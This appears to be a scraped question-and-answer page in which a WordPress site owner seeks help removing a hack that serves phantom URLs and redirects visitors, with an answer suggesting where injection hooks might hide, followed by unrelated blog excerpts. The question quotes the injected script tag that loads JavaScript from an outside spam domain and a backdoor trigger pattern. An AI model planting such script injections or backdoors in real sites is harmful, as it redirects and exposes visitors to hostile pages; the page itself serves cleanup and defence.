javascript - Wordpress site hacked - phantom url -


my wordpress website hacked recently, i've cleaned backdoor scripts left there there seems kind of phantom url doesn't exist in database @ if type site opens up.

for example:

mysite.com/needs-more-tuition

something of sort when page opens, not 404 page instead see js script being run before html generated in full , page redirects shady online tuition homework site.

i've looked high , low , have identified javascript code havent been able find in wordpress site install, nor in theme or plugin files.

i'm bit perplexed here , don't know - understanding echoing javascript before opening html tag of page - run before header compiled or so.

where should this? need cleaned up. google has penalized website , have coming placeholder there in meanwhile.

htaccess

here htaccess file:

# begin wordpress <ifmodule mod_rewrite.c> rewriteengine on rewritebase / rewriterule ^index\.php$ - [l] rewritecond %{request_filename} !-f rewritecond %{request_filename} !-d rewriterule . /index.php [l] </ifmodule>  # end wordpress

everything seems normal - i've removed al files had code remniscent of:

if(isset($_get['bot']))

urlwise have html file in place there bypass index.php now.

affected page details

the phanton url no in database, strange thing there content on page thought normal wordpress post. in html of page followng javascript snippet added @ top of file before opening html tag:

<nofollow><noindex><script src="http://essay-oneday.com/?jquery&source=mywebsite.com&keyword=introduction film essay"></script></noindex></nofollow><!doctype html>

seeing problem couple of things come mind. since saying page redirects site before html renders mean result of infected htaccess. if not custom template injection. template_include , template_redirect actions. intruder might careful enough not leave trace of needs-more-tution part. i'd suggest text in database in wp_posts table. 1 possibility page/post slug. , id used in template_redirect or template_include hook check current page , include js code redirect url. 1 other thing. notice in url redirection occurs first. should url in both code , database. after totally hypothetical. without seeing hard comment.


Comments

Post a Comment

Popular posts from this blog

javascript - Clear button on addentry page doesn't work -

this addentry blog page have made scratch , there underlying problems code particularly clear button supposed clear text entered when button clicked on doesn't work have saved html file problem. also 1 other problem submit button works doesn't pass of text index file have written php , reason whenever click on submit button redirects me index page without posting entry have made. <!doctype html> <html> <head> <script> function message() { alert("clear form?"); } </script> <style> body {background-color: beige;} h1 {color: black;} p {color: black;} textarea { width: 50%; height: 150px; padding: 12px 20px; box-sizing: border-box; border: 2px solid #ccc; border-radius: 4px; background-color: white; font-size: 16px; resize: none; } div { padding-left: 20px; } </style> </head> <meta charset="utf-8"> <link rel="stylesheet" href=".
Read more

c# - Selenium Authentication Popup preventing driver close or quit -

i have selenium automated task setup login website retrieve information. it's basic in automation. logging in , clicking 2 links. running issue proving problem. the site in question uses authentication required popup not javascript popup rather regular windows auth popup. have read isn't handled out of box selenium. i using " http://username:password@url.com " site every , site has issues on end prompt me again username/password randomly. have enter username/password twice in row when navigating there hand. since task loops continuously few hours picking needed info figured use webdriverwait verify element present on page. if authentication popup appears, element isn't present. no need care run, start over. the problem having when authentication popup displayed , hit timeout limit want close driver/browser window can start task on again. however, driver.close() , driver.quit() not doing anything. browser remains open , unloaded page still there login p
Read more

tensorflow when input_data MNIST_data , zlib.error: Error -3 while decompressing: invalid block type -

i'm geting started tensorflow,followed tutorials,but cannot download mnist data. import tensorflow tf tensorflow.examples.tutorials.mnist import input_data mnist=input_data.read_data_sets("mnist_data/",one_hot=true) print("download done!") error information: extracting mnist_data/train-images-idx3-ubyte.gz traceback (most recent call last): file "/home/sj/program/tesorflow_try.py", line 6, in <module> mnist=input_data.read_data_sets("mnist_data/",one_hot=true) file "/usr/local/lib/python2.7/dist-packages/tensorflow/contrib/learn/python/learn/datasets/mnist.py", line 213, in read_data_sets train_images = extract_images(f) file "/usr/local/lib/python2.7/dist-packages/tensorflow/contrib/learn/python/learn/datasets/mnist.py", line 60, in extract_images buf = bytestream.read(rows * cols * num_images) file "/usr/lib/python2.7/gzip.py", line 268, in read self._read(readsize) file
Read more